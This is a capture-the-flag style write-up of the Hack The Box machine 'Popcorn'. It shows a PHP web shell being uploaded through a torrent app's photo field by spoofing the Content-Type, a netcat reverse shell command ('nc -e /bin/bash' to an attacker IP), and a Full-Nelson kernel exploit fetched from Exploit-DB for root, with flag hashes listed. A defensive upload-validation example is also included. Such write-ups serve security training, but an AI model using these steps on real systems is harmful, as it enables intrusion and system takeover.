# Popcorn

## Popcorn - 10.10.10.6

### Target Enumeration:

OS: Linux

IP: 10.10.10.6

User: 5e36a919398ecc5d5c110f2d865cf136

Root: f122331023a9393319a0370129fd9b14

### Ports / Services / Software Versions Running

```
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) 
80/tcp open http Apache httpd 2.2.12 ((Ubuntu)) 
```

### Vulnerability Exploited:

The photo upload in the torrent application allows remote code execution: a malicious PHP file is uploaded and the request's Content-Type is modified in Burp so the upload is accepted.

### Privilege escalation

Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation

<https://www.exploit-db.com/exploits/14339/>

### Exploiting the host:

Nmap

<div align="left"><img src="https://lh6.googleusercontent.com/q57fQOdBDklxzyqKZeJZ2oDedRRZLjPLnmaOPy9YUXxVDm8jffsytpKZgw2AUgu3m07sav1Up4oThSI5gYOLwtwKupRFNFH_pSeliImZ669rvMJ3X_PIeOARFiw8GU-fj73C6MQv" alt=""></div>

Dirb found /torrent.

<div align="left"><img src="https://lh4.googleusercontent.com/aIB_mXtbpkZ2I0CS4IK9jBm-qx1m-RgtoBFfDA1sLIay47ZhJW3NDzr6urNhVvXiohq-Ot4ZqgfecU1D_Lx4GJ97auskGnPbnxOhb16Uxa5Sb1dY_PjtjrqXUAcyu8ErP19ML0Qs" alt=""></div>

It appears to be a torrent hosting application.

<div align="left"><img src="https://lh6.googleusercontent.com/-pNSZ6bwfOgY8de_8DVHJw08l7HCyinGhvynDM_X9XGKFX3XsaUNeqw1sIbEBpPlKh1YG1cJCYYigYWMHdnBavU8bHy8TJSJpgkgMq_Y5gR4gfUlLsODsI-7_Oegjq-E5X3JPW9c" alt=""></div>

Application allows users to sign up and upload torrents.

<div align="left"><img src="https://lh6.googleusercontent.com/nSJf-vJ8WTqgcDysR1mJvlhyRwenu8Ofl7jmbSEeOnmCFrJ3FG8ncUugiSv8vs6nGiteaLR0EMaiv2pasr0w8Uw6_9-ucE52W8uAU149vQCC0IFiT_B6XQNVA2YGwWnfhIGPYhuz" alt=""></div>

Find a clean torrent file (I used Debian).

<div align="left"><img src="https://lh3.googleusercontent.com/RaPcoJJMgXuopLKLO37ov9D4jbYp4zFbVlhorJVxTl4wjJuINkdrcWTHTglMs6L2-z8uygmv81F-XfyV2WQAzjbEerZgZYpIZ0I3s0DrfMEashPn_rqtpF96zoFK5R3qNyCLNMjb" alt=""></div>

Upload it to the app.

<div align="left"><img src="https://lh5.googleusercontent.com/sq-dOfkC8w-ACRcc6eWBWAx55lHZKU5KJPQD134t5aaRSCP7sUkM5qSElOU7YlA-BaLfqcS5yT2lCYQotI5g_DM7LfgYd6Q97ypreao9GOL4gpvG5I7NedmiGu1Q5OHkglTYrZ8A" alt=""></div>

Edit the torrent once it is uploaded.

The vulnerable point is the photo section, so find a simple PHP backdoor shell.

<div align="left"><img src="https://lh4.googleusercontent.com/2z5ddNJUg__WtJrUaIntSQMRYaLAFA8IqFROBflCpjWK4BcMD4u_LafyPJyvwZXNsAUZOn3phyFMoFt5gX5lPDvDfpHiHkuxbX3iE6QOGv46Z1W5JuIMM9VJc62rt2Dffpze1oqQ" alt=""></div>

Rename it to shell.jpg.php and upload the shell to the app. Catch the request in Burp.

<div align="left"><img src="https://lh6.googleusercontent.com/YFJ1Ym8Qf_WVwcnCt0kuUPCTM-brqiz1J9_52fqJSWA-IindWGR_pMg67MsRMzoEE2PQxWdEl_G6eO6RUHObESXQ8YYphy0DXZS7envzTxjGVi6kmO5YoIwXpxn4Eoi0NDl7ga5A" alt=""></div>

Change the content type of the uploaded file part to `Content-Type: image/jpg`.

This uploaded successfully.

<div align="left"><img src="https://lh5.googleusercontent.com/WMrLvKLVq4h2JycU2Jpk-opxrElHQu6wNJuj0oweqS4eikslWYIlSvJRKaGNL13_F2icS110TW3LkipwIOf3SzjyWIMNKNEhY1MHJox5FadWxDnhA6TVFBYVqHHwsqGs1sG8CALl" alt=""></div>
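The upload above was accepted because the application trusted the client-supplied Content-Type and did not look at the real extension or file bytes. As an added example (not code from the write-up or from the torrent application), the following server-side check rejects a double-extension name like shell.jpg.php regardless of the header, verifies magic bytes, and stores the file under a server-chosen name; `validate_image_upload`, `run_samples`, `IMAGE_MAGIC` and the sample uploads are all constructed for this illustration.

```python
import os
import secrets

# Allowed image extensions and the magic bytes a genuine file of that type starts with.
IMAGE_MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

def validate_image_upload(filename, data, content_type):
    """Return (accepted, reason, stored_name) for an uploaded 'photo'.

    The client-supplied Content-Type is only echoed into the reason for logging;
    it never influences the decision, because it is trivially editable in a proxy.
    """
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    if len(parts) != 2 or not parts[0]:
        # Names like "shell.jpg.php" land here: Apache's PHP handler keys on the
        # last extension, so a "contains .jpg" check is not enough.
        return False, "expected exactly one extension in %r" % base, None
    ext = parts[1]
    if ext not in IMAGE_MAGIC:
        return False, "extension .%s is not an allowed image type" % ext, None
    if not any(data.startswith(magic) for magic in IMAGE_MAGIC[ext]):
        return False, "bytes are not a %s (client claimed %s)" % (ext, content_type), None
    # Store under a server-generated name; the user-controlled name never reaches disk.
    stored_name = "%s.%s" % (secrets.token_hex(8), ext)
    return True, "ok", stored_name

# Constructed sample uploads mirroring the write-up: a spoofed Content-Type on a
# double-extension PHP file, PHP bytes behind a .jpg name, and a real JPEG header.
SAMPLE_UPLOADS = [
    ("shell.jpg.php", b"<?php /* constructed placeholder */ ?>", "image/jpg"),
    ("shell.jpg", b"<?php /* constructed placeholder */ ?>", "image/jpeg"),
    ("debian.jpg", b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32, "image/jpeg"),
]

def run_samples():
    """Apply the check to each sample; returns a list of (name, accepted, reason)."""
    return [(name, *validate_image_upload(name, data, ctype)[:2])
            for name, data, ctype in SAMPLE_UPLOADS]

if __name__ == "__main__":
    for name, accepted, reason in run_samples():
        print("%-14s %s  %s" % (name, "ACCEPT" if accepted else "REJECT", reason))
```

Only the genuine JPEG is accepted; the first two samples are rejected on the filename and on the file bytes respectively, no matter what Content-Type the client sends.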

Inspect the image from the webapp to find the true path.

<div align="left"><img src="https://lh6.googleusercontent.com/zRNKvyJvDhfdVpTP3rBGQ2VedlkkfxM130XPrVKV4mr5NPHCApUNuCMDfFT3fAfNhha-awvIwIPQChZ84OcWTmA5_WAX-jvVPOxz_0_yLCYDr3mRLhNn5Z8HoZgzwimDnI-z799u" alt=""></div>

Visit the true path and append `?cmd=id` after the .php extension.

<div align="left"><img src="https://lh4.googleusercontent.com/Tnr3QaXh4bf6CQ7lWneX5EbH1b7EyN9vvpKV_b7N3LrZDsIQTiO2Q52Vqz7P_wR1eqaH5e54nyQvOl57HD1H2i4u791dt-iUtjekm1ACHGz0SQO5_tlffMdqrYAlxAlLa5_QIhS5" alt=""></div>

Looking in /bin, we see nc is installed.

<div align="left"><img src="https://lh4.googleusercontent.com/LpRCCq01blumbMXHpSL2b3CvvJKofmgAwPdNjLzlxnwQVojxzYN4olslZBVE_ML44EI7G90QtWTQcBYec3n0Jlf-CjsPDZV7o-U78DxljAtez98jQNo9tiJl_QffA5rvcvQ1xgig" alt=""></div>

Set a listener on port 443 and execute `nc -e /bin/bash 10.10.14.11 443` via the browser.

Now you have a shell.

<div align="left"><img src="https://lh6.googleusercontent.com/fYJMxj94QyZNsQD7w3-oRTdL0lX6ADXdzLBgaTwWP9cI1oSRIGRD4PNY8ZN2NLWBqAKCOyFJp7C7cm8sPwAFDdqVT5lBvRZRRoft23fEqL9Gh42Uv7y3L2aMOoKjWUDDoHBTqJ0D" alt=""></div>

Move to /dev/shm and download enumeration scripts.

<div align="left"><img src="https://lh4.googleusercontent.com/8c1yBmPONd1A3jeic3uvLShKgdseYkUgmO56qd6wM6Gool-d04HWsYsIExF7TUX9Itu_4EETuc6AaV4GdUz-w93OtEr3RvKoYwqtrBv0v8Xej37GP8Xm7qx9rsnv_eZY_1Qx0Hi8" alt=""></div>

Google the kernel version for privesc opportunities.

Run further tools while researching kernel exploits.

The easiest route is likely Full-Nelson, based on the `uname -a` output.

Download it from Exploit-DB:

```
wget https://www.exploit-db.com/download/15704.c
```

Now, on Popcorn, download and compile the exploit, then run it to get root.

<div align="left"><img src="https://lh3.googleusercontent.com/bsLpo03M7huYiHCfNP2eQDnYRCcJV4znYXYFfnyhgJCMt4rZJeR1KeH4odFyJTaKIjDz5Huvo_mevVfAfntc9i0N7eCyrsyaW7P6vxWLEIYs1kOKUOeaj_3XUEp690WaUgiJ9HWZ" alt=""></div>
